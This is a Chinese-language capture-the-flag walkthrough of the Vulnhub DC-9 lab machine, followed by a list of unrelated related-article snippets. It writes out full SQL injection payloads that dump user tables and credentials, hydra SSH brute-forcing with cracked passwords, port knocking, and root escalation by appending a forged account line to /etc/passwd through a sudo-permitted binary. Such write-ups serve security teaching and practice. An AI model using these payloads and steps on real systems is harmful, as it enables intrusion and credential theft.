信息收集:

root@kali:/opt/test# nmap -A -v 192.168.76.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 21:51 CST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating ARP Ping Scan at 21:51
Scanning 192.168.76.137 [1 port]
Completed ARP Ping Scan at 21:51, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:51
Completed Parallel DNS resolution of 1 host. at 21:52, 13.01s elapsed
Initiating SYN Stealth Scan at 21:52
Scanning 192.168.76.137 [1000 ports]
Discovered open port 80/tcp on 192.168.76.137
Completed SYN Stealth Scan at 21:52, 0.14s elapsed (1000 total ports)
Initiating Service scan at 21:52
Scanning 1 service on 192.168.76.137
Completed Service scan at 21:52, 6.04s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.76.137
NSE: Script scanning 192.168.76.137.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.22s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.01s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Nmap scan report for 192.168.76.137
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:79:DB:F0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 14.277 days (since Mon Sep 7 15:13:16 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros

访问80端口的Web服务,在search目录下存在sql注入,union查询判断列数,得到列数为6:

读取数据库名:

search=Mary'%20union%20SELECT%20database(),2,3,4,5,6;%20--%20

得到数据库名:staff

读取数据库中的表名:

search=Mary'%20union%20SELECT%20TABLE_NAME,2,3,4,5,6%20FROM%20information_schema.tables%20WHERE%20TABLE_SCHEMA%3ddatabase();%20--%20
得到表名:

读取列名:

search=Mary'%20union%20SELECT%20column_name,2,3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name='Users';%20--%20

  

从Users表中读取ID、用户名、密码:

search=Mary'%20union%20SELECT%20UserID,2,3,Username,Password,6%20FROM%20Users;%20--%20 

得到用户名和密码:admin: 856f5de590ef37314e7c3bdf6f8a66dc

在线解密得到明文:transorbital1

使用该用户名登录,在manage目录下存在本地文件包含:

尝试包含日志文件失败,无法通过包含日志实现getshell。前文中sql注入还有另外一个数据库,将数据库中的信息dump出来:

读取数据库信息:

search=Mary' union select schema_name,2,3,4,5,6 from information_schema.schemata;--

读取users中的表:

search=Mary' union select table_name,2,3,4,5,6 from information_schema.tables where table_schema='users';--

从UserDetails中读取列名:

search=Mary' union select column_name,2,3,4,5,6 from information_schema.columns where table_schema='users' and table_name='UserDetails';--

读取username和password字段:

search=Mary' union select 1,2,3,username,password,6 from users.UserDetails;--

将用户名和密码整理成两个文件,得到用户名和密码对应关系如下:

user        password
marym 3kfs86sfd
julied 468sfdfsd2
fredf 4sfd87sfd1
barneyr RocksOff
tomc TC&TheBoyz
jerrym B8m#48sd
wilmaf Pebbles
bettyr BamBam01
chandlerb UrAG0D!
joeyt Passw0rd
rachelg yN72#dsd
rossg ILoveRachel
monicag 3248dsds7s
phoebeb smellycats
scoots YR3BVxxxw87
janitor Ilovepeepee
janitor2 Hawaii-Five-0

结合etc/passwd文件,用户在passwd中都有账号,尝试使用hydra爆破,但是22端口的访问被过滤,这是由于使用了knockd服务(https://www.cnblogs.com/bask/p/9159197.html)

需要先连接目标主机的7469,8475,9842 3个端口才能打开连接:

root@kali:/opt/test# ssh 192.168.76.137
ssh: connect to host 192.168.76.137 port 22: Connection refused
root@kali:/opt/test# nmap -p7469,8475,9842 -Pn --max-retries=0 192.168.76.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 00:16 CST
Nmap scan report for 192.168.76.137
Host is up (0.00041s latency). PORT STATE SERVICE
7469/tcp closed unknown
8475/tcp closed unknown
9842/tcp closed unknown
MAC Address: 00:0C:29:79:DB:F0 (VMware) Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds
root@kali:/opt/test# ssh 192.168.76.137
The authenticity of host '192.168.76.137 (192.168.76.137)' can't be established.
ECDSA key fingerprint is SHA256:o2Ii/WX152zZCRlVrfXpNnX8mvNwYfOWhkMscAr+sMs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.76.137' (ECDSA) to the list of known hosts.
root@192.168.76.137's password:

此时,使用hydra结合之前的用户名密码进行爆破:

root@kali:/opt/test# hydra -L user.txt -P pass.txt ssh://192.168.76.137
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-23 00:20:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.76.137:22/
[22][ssh] host: 192.168.76.137 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.76.137 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.76.137 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-23 00:21:13

得到3组用户名密码。依次登录后发现,3者都没有sudo权限,但是在janitor的home目录下有隐藏文件夹:

root@kali:/opt/test# ssh janitor@192.168.76.137
janitor@192.168.76.137's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Sep 23 10:21 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Sep 23 10:21 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ sudo -l We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things: #1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility. [sudo] password for janitor:
Sorry, user janitor may not run sudo on dc-9.
janitor@dc-9:~$ more .secrets-for-putin/ *** .secrets-for-putin/: directory *** janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ more passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$

收集该密码存为文本,再次使用之前的用户名列表进行爆破:

root@kali:/opt/test# cat putin_pass.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHt
root@kali:/opt/test# hydra -L user.txt -P putin_pass.txt ssh://192.168.76.137
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-23 00:34:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 102 login tries (l:17/p:6), ~7 tries per task
[DATA] attacking ssh://192.168.76.137:22/
[22][ssh] host: 192.168.76.137 login: fredf password: B4-Tru3-001
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-23 00:35:09

该账号有一个无需密码以root身份执行的服务:

fredf@dc-9:~$ ls -la
total 12
drwx------ 3 fredf fredf 4096 Sep 23 10:34 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 fredf fredf 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 fredf fredf 4096 Sep 23 10:34 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test

该路径下的test是一个ELF文件,尝试通过find模糊查找test相关的文件:

fredf@dc-9:/opt/devstuff/dist/test$ file test
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=28ba79c778f7402713aec6af319ee0fbaf3a8014, stripped
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test*" 2>/dev/null
/opt/devstuff/test.spec
/opt/devstuff/build/test
/opt/devstuff/build/test/test
/opt/devstuff/test.py
/opt/devstuff/dist/test
/opt/devstuff/dist/test/test

在上层父路径下找到一个test.py文件,该文件的作用是将A文件的内容追加到B文件后面:

fredf@dc-9:/opt/devstuff$ more test.py
#!/usr/bin/python import sys if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1) else :
f = open(sys.argv[1], "r")
output = (f.read()) f = open(sys.argv[2], "a")
f.write(output)
f.close()

如此可以考虑将新建root用户信息写入文件A将文件A中的信息追写到/etc/passwd,实现提权。

基于sha-512生成一个123456的密码:

root@kali:/opt/test# mkpasswd -m sha-512 123456
$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71

拼接一个新用户的信息:

admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash

写入文件中:

fredf@dc-9:/opt/devstuff/dist/test$ vi /tmp/new_user
fredf@dc-9:/opt/devstuff/dist/test$ cat /tmp/new_user
admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash

使用sudo执行test将用户信息写入/etc/passwd,然后切换用户身份为admin,密码123456:

fredf@dc-9:/opt/devstuff/dist/test$ sudo /opt/devstuff/dist/test/test /tmp/new_user /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password:
root@dc-9:/opt/devstuff/dist/test# whoami
root

得到root权限,拿到flag:

root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt ███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝ Congratulations - you have done well to get to this point. Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges. I also want to send out a big thank you to the various members of @m0tl3ycr3w . They are an inspirational bunch of fellows. Sure, they might smell a bit, but...just kidding. :-) Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series. So long, and thanks for all the fish.

总结:

1、SQL手工注入

2、knock敲门打开SSH端口

3、hydra爆破用户名、密码

4、使用不需要root密码的sudo服务提权

vulnhub: DC 9的更多相关文章

  1. vulnhub: DC 3

    通过nmap扫描,只开放了80端口,并且该web服务是基于Joomla搭建: root@kali:~# nmap -A 192.168.74.140 Starting Nmap 7.80 ( http ...

  2. vulnhub: DC 4

    信息收集: yurang@kali:~$ nmap -sn 192.168.76.1/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 ...

  3. vulnhub靶机之DC6实战(wordpress+nmap提权)

    0x00环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip dc6以nat模式在vmware上打开 kali2019以nat模式启动,ip地址为 ...

  4. Vulnhub靶场DC-1 WP

    前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...

  5. DC靶机1-9合集

    DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基 ...

  6. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

  7. Vulnhub dc-4靶机通关

    Vulnhub dc-4靶机通关 下载地址:https://download.vulnhub.com/dc/DC-4.zip 安装好dc-4靶机 使用局域网查看器扫描到ip地址 端口扫描,发现运行了8 ...

  8. LDAP 中 CN, OU, DC 的含义

    1. LDAP的存储规则 区分名(DN,Distinguished Name) 和自然界中的树不同,文件系统/LDAP/电话号码簿目录的每一片枝叶都至少有一个独一无二的属性,这一属性可以帮助我们来区别 ...

  9. 【关于HBITMAP, DC, MEM DC, Clipboard】将HBITMAP拷贝到Clipboard(Windows Clipboard & OLE Clipboard)

    参考: Programming Windows with MFC, 2nd. Chapter 18, 19. 建议把这两章学习完(至少到OLE drag-and-drop之前要学习完)再来尝试OLE ...

随机推荐

  1. Idea启动报错 Error:java: System Java Compiler was not found in classpath

    报错信息:Error:java: System Java Compiler was not found in classpath 使用IDEA启动的时候出现了这个错误,查找了很久,才找到解决办法 1. ...

  2. Linux 系统编程 学习:04-进程间通信2:System V IPC(1)

    Linux 系统编程 学习:04-进程间通信2:System V IPC(1) 背景 上一讲 进程间通信:Unix IPC-信号中,我们介绍了Unix IPC中有关信号的概念,以及如何使用. IPC的 ...

  3. python构造函数和析构函数

    构造函数和析构函数 关注公众号"轻松学编程"了解更多. 1.构造方法的使用 ​ 很多类都倾向于将对象创建为有初始化状态.因此类可以定义一个名为__init__()的特殊方法(构造方 ...

  4. Java进阶专题(十六) 数据结构与算法的应用(上)

    前言 ​ 学习算法,我们不需要死记硬背那些冗长复杂的背景知识.底层原理.指令语法--需要做的是领悟算法思想.理解算法对内存空间和性能的影响,以及开动脑筋去寻求解决问题的最佳方案.相比编程领域的其他技术 ...

  5. 833. Find And Replace in String —— weekly contest 84

    Find And Replace in String To some string S, we will perform some replacement operations that replac ...

  6. php 之批量生成 mysql 语句 注释

    工作需要 需要更新 所有表的注释 不影响原结构之上进行更新 <?php class Ceshi extends CI_Controller{ function __construct() { p ...

  7. leetcode103:permutations-ii

    题目描述 给出一组可能包含重复项的数字,返回该组数字的所有排列 例如: [1,1,2]的排列如下: [1,1,2],[1,2,1], [2,1,1]. Given a collection of nu ...

  8. 你真的会用PostGIS中的buffer缓冲吗?

    buffer - 图形缓冲区分析,GIS中最基本的空间分析之一. 实现buffer的工具有很多种,例如前端的truf.js.服务端的ArcGISserver.桌面端的ArcMap.数据库端的PosrG ...

  9. 配置PoE交换机功能

    组网图形 PoE简介 随着网络中IP电话.网络视频监控以及无线以太网应用的日益广泛,通过以太网本身提供电力支持的要求也越来越迫切.多数情况下,接入点设备需要直流供电,而接入点设备通常安装在距离地面比较 ...

  10. pandas_01

    # Pandas 知识点总结 # Pandas数据结构:Series 和 DataFrame import pandas as pd import numpy as np # 一,Series: # ...